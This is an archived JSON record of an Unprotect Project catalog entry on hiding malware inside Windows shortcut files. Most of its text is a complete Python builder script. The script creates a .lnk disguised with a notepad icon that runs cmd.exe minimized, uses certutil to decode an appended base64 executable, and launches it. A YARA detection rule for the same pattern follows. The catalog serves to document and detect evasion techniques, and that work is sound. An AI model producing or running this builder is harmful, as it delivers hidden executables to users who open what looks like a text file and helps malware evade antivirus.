{
	"id": "eab6f52a-bc4f-40b8-ac83-54ff0a7d3d3f",
	"created_at": "2026-04-06T00:14:25.724244Z",
	"updated_at": "2026-04-10T03:21:16.646671Z",
	"deleted_at": null,
	"sha1_hash": "b77ee78abce94b30fdb0763f59c4e65025a08473",
	"title": "Shortcut Hiding - Unprotect Project",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 47382,
	"plain_text": "Shortcut Hiding - Unprotect Project\r\nArchived: 2026-04-05 15:38:50 UTC\r\nWindows shortcut can be used to store code that downloads a malicious file from the internet, or that stores the\r\nmalicious file directly within the shortcut itself. This can make it difficult for antivirus software to detect the\r\nmalicious application, as the file is not stored in a typical location on the computer. Additionally, the use of a\r\nshortcut can make it easier for the attacker to hide the malicious code and evade detection.\r\nTechnique Identifier\r\nU0505\r\nEvasion Categories\r\nCode Snippets\r\nDescription\r\nThis Python script can be used to create a Windows shortcut with an embedded file. The script takes two\r\narguments: the file to embed and the name of the generated shortcut. The script first creates a Windows shortcut\r\nusing the winshell module. The shortcut is configured to run a command that will decode the embedded file and\r\nthen execute it. The script then encodes the file to be embedded using the base64 module and appends the encoded\r\ndata to the shortcut file in the form of a certificate. Finally, the script prints the name of the generated shortcut to\r\nthe screen. 
When the shortcut is clicked, cmd.exe runs the one-liner, the embedded file is decoded to disk and executed, and the malware runs on the system.\r\n#!/usr/bin/env python3\r\n# Requirements:\r\n# -\u003e pip install pypiwin32\r\n# -\u003e pip install winshell\r\nimport argparse\r\nimport base64\r\nimport os\r\nimport pathlib\r\nimport random\r\nimport string\r\n\r\nimport winshell\r\n\r\n\r\ndef build_shortcut(file_to_embed, shortcut_name):\r\n    # The .lnk is written next to this script.\r\n    output_shortcut = \"{}{}.lnk\".format(\r\n        os.path.join(pathlib.Path(__file__).parent.resolve(), ''),\r\n        shortcut_name,\r\n    )\r\n    with winshell.shortcut(output_shortcut) as shortcut:\r\n        # @echo off \u0026 (for %i in (*.lnk) do certutil -decode %i [filename]) \u0026 start [filename].exe\r\n        # certutil decodes the PEM blob appended below into an .exe with a random name, then start runs it.\r\n        payload = \"@echo off\u0026(for %i in (*.lnk) do certutil -decode %i {0}.exe)\u0026start {0}.exe\".format(\r\n            \"\".join(random.choice(string.ascii_letters) for i in range(8))\r\n        )\r\n        shortcut.description = \"\"\r\n        shortcut.show_cmd = \"min\"  # run cmd.exe minimized\r\n        shortcut.working_directory = \"\"\r\n        shortcut.path = \"%COMSPEC%\"  # cmd.exe\r\n        shortcut.arguments = \"/c \\\"{}\".format(\r\n            payload,\r\n        )\r\n        shortcut.icon_location = (\"%windir%\\\\notepad.exe\", 0)  # disguise as a text file\r\n    # winshell writes the .lnk when the with block exits; only then append the base64 payload\r\n    # in PEM certificate form. The shell-link parser ignores the trailing data.\r\n    with open(file_to_embed, \"rb\") as file:\r\n        encoded_content = base64.b64encode(file.read())\r\n    with open(output_shortcut, \"ab\") as file:\r\n        file.write(b\"-----BEGIN CERTIFICATE-----\")\r\n        file.write(encoded_content)\r\n        file.write(b\"-----END CERTIFICATE-----\")\r\n    print(\"[+] Shortcut generated: \\\"{}\\\"\".format(output_shortcut))\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    parser = argparse.ArgumentParser(description=\"Create Windows Shortcut with Self-Extracting Embedded File.\")\r\n    parser.add_argument('-f', '--embed-file', type=str, dest=\"embed_file\", required=True, help=\"File to inject i\")\r\n    parser.add_argument('-n', '--shortcut-name', type=str, dest=\"shortcut_name\", required=True, help=\"Generated s\")\r\n    try:\r\n        argv = parser.parse_args()\r\n    except IOError as e:\r\n        parser.error(str(e))\r\n    build_shortcut(argv.embed_file, argv.shortcut_name)\r\n    print(\"[+] Done.\")\r\nAuthor: Jean-Pierre LESUEUR (DarkCoderSc) / Target Platform: Windows\r\nDetection Rules\r\nrule YARA_Detect_ShortcutHiding\r\n{\r\n    meta:\r\n        author = \"Unprotect\"\r\n        status = \"Experimental\"\r\n        description = \"YARA rule for detecting Windows shortcuts with embedded malicious code\"\r\n    strings:\r\n        // StringData in a shell link is UTF-16LE when the IsUnicode flag is set, so match both encodings\r\n        $payload_start = \"\u0026(for %i in (*.lnk) do certutil -decode %i\" ascii wide\r\n        $payload_end = \"\u0026start\" ascii wide\r\n        // the appended PEM wrapper is plain ASCII\r\n        $encoded_content = \"BEGIN CERTIFICATE\"\r\n    condition:\r\n        all of them\r\n}\r\nLast Revised\r\nMarch 24, 2026\r\nSource: https://unprotect.it/technique/shortcut-hiding/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://unprotect.it/technique/shortcut-hiding/"
	],
	"report_names": [
		"shortcut-hiding"
	],
	"threat_actors": [],
	"ts_created_at": 1775434465,
	"ts_updated_at": 1775791276,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b77ee78abce94b30fdb0763f59c4e65025a08473.pdf",
		"text": "https://archive.orkl.eu/b77ee78abce94b30fdb0763f59c4e65025a08473.txt",
		"img": "https://archive.orkl.eu/b77ee78abce94b30fdb0763f59c4e65025a08473.jpg"
	}
}